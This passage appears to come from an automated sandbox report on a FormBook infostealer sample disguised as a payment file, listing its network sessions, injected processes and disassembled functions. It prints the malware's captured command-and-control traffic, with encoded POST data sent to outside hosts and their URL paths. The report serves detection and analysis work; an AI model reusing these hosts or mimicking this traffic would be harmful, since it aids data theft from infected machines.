nl=1LbI5jFIlZpsSFOQ5gJ2wyU2EHs5y3qzEoUiKo5Vq+qZqkxJyfvZKCsLy17vdtLdtCdbv0lN1dj3/AXfDWezNk559+8vb2qypZ2gnWm2kQXy+z6sy92rBFohWOyzJiGElWor5X0N5sPoxslnX2EQOlz++HF5EH8Ib6+KdY6eVKI9LcelNopHiAyoz3BHULAffdTlvxAQddDTFw1ahXsGQ31qhJFSpq4codMR1SRKpbhI3D0dzLzRmUPVpUQv+Kx88yFW9HSYgwQQXSVqzC+FxFieH4S/jZVHKoPs+tOfiNDAWVremc4FVLNaCHYsq6XEE/NkrJmlcwnY6PZx7OR1GZgeJR+8dVPQIK7cFNICpePv/f1UT7kiIpts/f18wup0OosEekK/m0+2B80U2mFAOuTciJJ+hQq7jNXVcQJ1VQuhTKNkKXAltz8MY4EoZvOyrNYkhRJgEn/Cr5wnb7dVBxkjkv2A6oX+GrNaoU8PVePCxm1fk+0lBiNf8QilXaRvhqFPuNVLc6Vmf1e4Sgf5QCLZGHcPUVIh28Et9y4ptxeZtCwZXIspIr5JjBMPIeRRWG9yw4pLgkkA4LocWDhgfMHwjYYnSqt/P3aXMnH82Qd6BLpTPqf2p6BVI496mgfwhHRQQr3zDx58Dul+av3GmsL/CF2ULTIus+G8bhN5MkH3oHf84ClH8H3tzgg/+QegR7TkVNOW5bwMmfgFJMS1JyoflEFmFTgQPZWi4k9wAsX/q9QPhC15ops/GQIATFrSSv98x0odL0YqZyGA6pIr/IyavumtDBOkDGwFHSHZeXjIy5ROz0rh2vHOy7e+Qd7Zn5NvmiRjp2NIR2frOoI8/AyJlMhcNoZGsMFNG4tGJw48R/ujb9y7ZuPOMr4ALFFaDbIQ/EofkvsDr9Kc13w7ePczof4Bfpsfp1ljeZ08o/UIavfl5UYZOLnWlF4YZCuZ7pZ4tAJxwdaZKUGL+3t5KPhrj1+koeCpxL+9JvDXISn+wHxlM [TRUNCATED]
Nov 1, 2024 03:48:49.309011936 CET	1052	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:48:49 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ukfpwmFHHCV2Giuk3DJsF1h6rgSqUPWY051ZiplgxZayO3f6%2BiBLMkn6t2MKyFXq837Eiu%2Fmt6mnYHcXkrHn%2BHFMCIUo53xX6xxTmSYFhGPMS0BkZ8dDo24p5AZZhrRgwskgASKe4ys%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db8916a1eb946c6-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1221&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1766&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a Data Ascii: eaTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(bY<;
Nov 1, 2024 03:48:49.309043884 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	50033	188.114.96.3	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:48:50.967103004 CET	471	OUT	GET /3p0l/?dbL=d8WX_v0PGVHXAtK&nl=4Jzo6X1Gluc/SF20pEVAyAZrEiE76xvvY+EfZYFlmMajnWRT/uq2dkdTzHDiVdaw3QhDvVFcv5rBuyftUViEMVRHp90uGCn944ajrH63wHv4zzWs5+CZDXB+Ld7sX0D68A== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.timizoasisey.shop User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Nov 1, 2024 03:48:51.877824068 CET	1098	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:48:51 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A3fX%2BGH3n4MSr74VKwm2XQPIucNfP6TVqclRNKNeoOOQNhYiwjOxH9vHPdAuHI4sbw7CubedeoHdflp%2BqJrSqOkUt0TvtesoTlPqddN%2BZPohESC6lB2jl84AdiFdgjcHsMmiyuJiOKk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db8917a18e46b2e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=471&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	50034	103.191.208.137	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:48:57.686238050 CET	735	OUT	POST /f01d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Connection: close Host: www.roopiedutech.online Origin: http://www.roopiedutech.online Referer: http://www.roopiedutech.online/f01d/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 4d 45 4a 56 56 6e 76 55 79 47 5a 61 36 57 32 61 41 53 58 47 34 6c 2b 62 77 69 4b 6a 47 69 4c 38 78 71 59 50 45 70 62 62 70 53 33 41 77 50 74 65 6e 56 67 54 62 67 4f 7a 73 41 68 6f 30 64 70 51 4a 65 43 68 34 49 73 2b 68 4d 4c 70 33 63 38 34 53 55 44 7a 39 2f 39 73 46 6c 55 78 7a 54 4c 76 69 42 6e 52 68 78 54 39 4b 7a 46 4c 57 55 43 50 33 62 43 6f 30 72 65 2b 34 48 33 69 41 68 4a 45 6a 68 36 36 74 46 39 59 49 4b 75 50 46 42 6c 52 6a 71 55 72 31 62 45 47 4c 6b 6e 6f 42 74 46 6f 59 6e 6a 55 57 57 46 4a 67 70 39 75 44 75 4e 48 53 38 45 4b 33 77 4d 59 6c 4b 58 41 39 67 76 4b 78 51 6f 43 55 54 6f 3d Data Ascii: nl=MEJVVnvUyGZa6W2aASXG4l+bwiKjGiL8xqYPEpbbpS3AwPtenVgTbgOzsAho0dpQJeCh4Is+hMLp3c84SUDz9/9sFlUxzTLviBnRhxT9KzFLWUCP3bCo0re+4H3iAhJEjh66tF9YIKuPFBlRjqUr1bEGLknoBtFoYnjUWWFJgp9uDuNHS8EK3wMYlKXA9gvKxQoCUTo=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	50035	103.191.208.137	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:49:00.238840103 CET	755	OUT	POST /f01d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Connection: close Host: www.roopiedutech.online Origin: http://www.roopiedutech.online Referer: http://www.roopiedutech.online/f01d/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 4d 45 4a 56 56 6e 76 55 79 47 5a 61 72 44 6d 61 54 68 2f 47 2f 46 2b 59 30 53 4b 6a 63 53 4c 77 78 71 55 50 45 74 6a 4c 71 6b 6e 41 78 74 46 65 32 67 41 54 59 67 4f 7a 6e 67 68 74 71 74 70 4c 4a 65 4f 48 34 4e 55 2b 68 4e 76 70 33 63 4d 34 4f 33 72 38 37 76 39 75 4d 46 55 33 35 7a 4c 76 69 42 6e 52 68 31 37 48 4b 7a 4e 4c 58 6b 79 50 32 36 43 72 34 4c 65 2f 76 33 33 69 45 68 4a 2b 6a 68 36 49 74 41 55 7a 49 49 57 50 46 41 56 52 67 2f 67 71 37 62 45 4d 46 45 6e 33 58 76 42 73 52 6b 7a 5a 55 6c 30 52 7a 76 39 44 47 59 38 74 49 65 4d 69 6b 51 67 67 31 5a 66 33 73 51 4f 6a 72 7a 34 79 4b 45 2b 43 55 33 64 41 37 66 51 4d 66 59 53 66 4a 79 4d 46 63 67 39 48 Data Ascii: nl=MEJVVnvUyGZarDmaTh/G/F+Y0SKjcSLwxqUPEtjLqknAxtFe2gATYgOznghtqtpLJeOH4NU+hNvp3cM4O3r87v9uMFU35zLviBnRh17HKzNLXkyP26Cr4Le/v33iEhJ+jh6ItAUzIIWPFAVRg/gq7bEMFEn3XvBsRkzZUl0Rzv9DGY8tIeMikQgg1Zf3sQOjrz4yKE+CU3dA7fQMfYSfJyMFcg9H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	50036	103.191.208.137	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:49:02.992240906 CET	1772	OUT	POST /f01d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Cache-Control: no-cache Connection: close Host: www.roopiedutech.online Origin: http://www.roopiedutech.online Referer: http://www.roopiedutech.online/f01d/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 4d 45 4a 56 56 6e 76 55 79 47 5a 61 72 44 6d 61 54 68 2f 47 2f 46 2b 59 30 53 4b 6a 63 53 4c 77 78 71 55 50 45 74 6a 4c 71 6b 76 41 77 65 39 65 6e 32 49 54 5a 67 4f 7a 6b 67 68 73 71 74 6f 52 4a 65 57 44 34 4d 6f 45 68 4f 48 70 32 2f 45 34 43 57 72 38 31 76 39 75 4f 46 55 79 7a 54 4b 37 69 43 66 56 68 78 66 48 4b 7a 4e 4c 58 6e 71 50 2f 4c 43 72 36 4c 65 2b 34 48 33 32 41 68 49 77 6a 68 69 79 74 41 59 46 49 59 32 50 46 67 46 52 69 4a 4d 71 6b 4c 45 4b 43 45 6d 69 58 75 38 79 52 6b 76 2f 55 6b 41 37 7a 6f 78 44 48 63 35 6e 66 64 4d 54 31 51 59 6b 2f 36 4c 70 75 58 71 2b 68 69 42 4a 42 54 75 32 5a 6e 42 31 75 4c 30 52 54 59 76 41 4c 6d 5a 54 65 47 51 78 74 63 2b 43 43 67 6a 51 7a 58 34 47 69 32 38 62 55 6e 52 33 62 2b 71 6e 47 42 62 48 32 64 7a 46 6f 7a 70 62 4e 34 4f 30 36 64 50 5a 44 48 58 73 41 46 72 46 65 33 75 71 65 6c 59 68 77 37 47 34 74 4c 62 33 57 71 43 55 7a 4b 54 6d 78 52 4e 6f 47 55 54 36 4b 70 68 31 78 53 5a 49 79 4b 63 45 5a 42 58 79 72 53 44 5a 41 74 45 4b 76 52 61 59 55 64 6b [TRUNCATED] Data Ascii: nl=MEJVVnvUyGZarDmaTh/G/F+Y0SKjcSLwxqUPEtjLqkvAwe9en2ITZgOzkghsqtoRJeWD4MoEhOHp2/E4CWr81v9uOFUyzTK7iCfVhxfHKzNLXnqP/LCr6Le+4H32AhIwjhiytAYFIY2PFgFRiJMqkLEKCEmiXu8yRkv/UkA7zoxDHc5nfdMT1QYk/6LpuXq+hiBJBTu2ZnB1uL0RTYvALmZTeGQxtc+CCgjQzX4Gi28bUnR3b+qnGBbH2dzFozpbN4O06dPZDHXsAFrFe3uqelYhw7G4tLb3WqCUzKTmxRNoGUT6Kph1xSZIyKcEZBXyrSDZAtEKvRaYUdkPcsCYEpEsudCoaY9dopKNGv2Rp17ho/abk7bBvHqVS0D1f0cC1yXjd2IEHBoJuI8UE2uPLIZIimh+c6C6+whNgGd0loxZtmTeamFcKQ1D2EclfayvP7DsbVqEZGKA09SnqZZU9ANOLmBO9FR82KbDoMtMzXhn/jMUdOHFcTGeg5bKbg20fY4o4jYbKJy/0KPG5CCT/LUS3zoL6x9HfjnK+w9Efi13YVPGYm3QivGYkUicGLxHy/DezlgAjl1yOvmfuOlJjr0Y5HzMfStdzZoEyP2Ws45pbguSjooD3fSS/fFv3MVrvs150AFrPAqG3jX0jWUPrNOUAJU3UnA2MRX0itXAe9Zma1KDa/v7/ai4LbASynLnpQkz9ebZ1Vy18qeJPepBP3JATRi/VPcaaIl2VoPiWUGPFl6gCr5vnIsU0jzWrUNcJIM78lkRYN+UFFZ32mPMZ6dPoV6I8AbfkVzVlz9TH/mCDikmvQJtq8EHP28aMT08upL5/djPuTu9rzlJWmmlF4VwdY8D8eJjNFAyG8taZGQwWKfTLWo4DNH/QSdUax5+06UgL2ZHacgfOdBSVhAEluxsnd8PRDCDiIj4hebParrLkP0AQj6qUmExiY6z53T88ccQ7PrjE5ONcCqw3xfjN+r38zPRLTFNvn7BeBn8ugOhAOeki [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.5	50037	103.191.208.137	80

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:49:05.938589096 CET	473	OUT	GET /f01d/?nl=BGh1WRbt41ta6S2FBwbFkSvU00HbY3eh/tMOUMfhmAze8NROyFh0EV68tSphjf8OeMOb/ck28qXApfwtDELR0J5SPWkS+xOxljfz11yABU5EX0aP/5qC9r+4s36BWCggxQ==&dbL=d8WX_v0PGVHXAtK HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.roopiedutech.online User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Nov 1, 2024 03:49:07.986437082 CET	530	IN	HTTP/1.1 301 Moved Permanently Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: http://roopiedutech.online/f01d/?nl=BGh1WRbt41ta6S2FBwbFkSvU00HbY3eh/tMOUMfhmAze8NROyFh0EV68tSphjf8OeMOb/ck28qXApfwtDELR0J5SPWkS+xOxljfz11yABU5EX0aP/5qC9r+4s36BWCggxQ==&dbL=d8WX_v0PGVHXAtK x-litespeed-cache: miss content-length: 0 date: Fri, 01 Nov 2024 02:49:07 GMT server: LiteSpeed vary: User-Agent

Target ID:	0
Start time:	22:44:58
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe"
Imagebase:	0x4b0000
File size:	754'688 bytes
MD5 hash:	7C86CD8C446E881A00E02C3C9CB629A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:45:04
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe"
Imagebase:	0xd0000
File size:	754'688 bytes
MD5 hash:	7C86CD8C446E881A00E02C3C9CB629A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:45:04
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe"
Imagebase:	0xfb0000
File size:	754'688 bytes
MD5 hash:	7C86CD8C446E881A00E02C3C9CB629A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2264308195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2290607286.0000000004E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2266187962.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:45:14
Start date:	31/10/2024
Path:	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe"
Imagebase:	0x780000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	22:45:16
Start date:	31/10/2024
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\colorcpl.exe"
Imagebase:	0x1000000
File size:	86'528 bytes
MD5 hash:	DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4487793740.00000000050A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4486586817.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4486891698.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	22:45:29
Start date:	31/10/2024
Path:	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe"
Imagebase:	0x780000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	22:45:41
Start date:	31/10/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	89
Total number of Limit Nodes:	5

Executed Functions

Function 04831C48 Relevance: .7, Instructions: 680
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2105167572.0000000004830000.00000040.00000800.00020000.00000000.sdmp, Offset: 04830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4830000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69bad855b4ceb18d20859f9517679086d6bca2d348d466baafca53b8f7519ab8
Instruction ID: 2583e675295cba9ea3bdb1dd8b8b458ad1c58faca28a93701eac9484553e2bf3
Opcode Fuzzy Hash: 69bad855b4ceb18d20859f9517679086d6bca2d348d466baafca53b8f7519ab8
Instruction Fuzzy Hash: E842AB30B012048FEB19EB69C454BAEB7F7AF89705F1449A9E505DB3A4CB35ED01CB91

Function 04CEAD88 Relevance: 1.7, APIs: 1, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 04CEAFDE

Memory Dump Source

Source File: 00000000.00000002.2105224116.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 675aad0f883719851e48f018d9359e5b286ee8aaa020ee0d5c6b7633d647e44d
Instruction ID: e0fe1f14479ffb290ca0f12e6a3897f1f7137aaab0d920d73b1f2ef4442a93ac
Opcode Fuzzy Hash: 675aad0f883719851e48f018d9359e5b286ee8aaa020ee0d5c6b7633d647e44d
Instruction Fuzzy Hash: D07113B0A00B059FDB24DF2AD45476ABBF2FF88304F108A2DD54A97A50D776FA45CB90

Function 04CE590C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 04CE59C9

Memory Dump Source

Source File: 00000000.00000002.2105224116.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f1788ea339d2a1fff4090d667e4d5a5612ad0dc367bd71b162263bc1768b34c2
Instruction ID: 65173fca617f67ff3bd005d66fd354edd79505532196c0d12c1258ee03e3fc2c
Opcode Fuzzy Hash: f1788ea339d2a1fff4090d667e4d5a5612ad0dc367bd71b162263bc1768b34c2
Instruction Fuzzy Hash: 0341F4B0C00719CBDB14DFAAC884BDDBBF6BF49314F20816AD408AB255DB756946CF50

Function 04CE44F0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 04CE59C9

Memory Dump Source

Source File: 00000000.00000002.2105224116.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d9908aeaff5caf3698322867cff31023b39f5d6d4ef7a223691674399ab7305b
Instruction ID: f81b1f46422290aaf5552bea1f366c8e876a65d07eacb2fba4512740cefb6d44
Opcode Fuzzy Hash: d9908aeaff5caf3698322867cff31023b39f5d6d4ef7a223691674399ab7305b
Instruction Fuzzy Hash: 8041E5B0C0071DDBDB24DFAAC844BADBBF6BF49314F20816AD408AB255DB756945CF50

Function 04CEB770 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04CED626,?,?,?,?,?), ref: 04CED6E7

Memory Dump Source

Source File: 00000000.00000002.2105224116.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5d79ef5bc6f018b8c7edab8bc0a2a469c7dcb7a99b9b2bb6c8a21b2731fccf6b
Instruction ID: c6a8dd1684aae1b03d32d6dbf354bc9c7a8168a8c26ca56a156c278a2efceaf4
Opcode Fuzzy Hash: 5d79ef5bc6f018b8c7edab8bc0a2a469c7dcb7a99b9b2bb6c8a21b2731fccf6b
Instruction Fuzzy Hash: 7421E4B5900249DFDB10CF9AD984AEEFBF9EB48310F14841AE919A3310D374A940DFA5

Function 04CED658 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04CED626,?,?,?,?,?), ref: 04CED6E7

Memory Dump Source

Source File: 00000000.00000002.2105224116.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2863dbc5f06d5d4c419c2aacd7626bd54ad9697db7e1f86450479b8c60997fd7
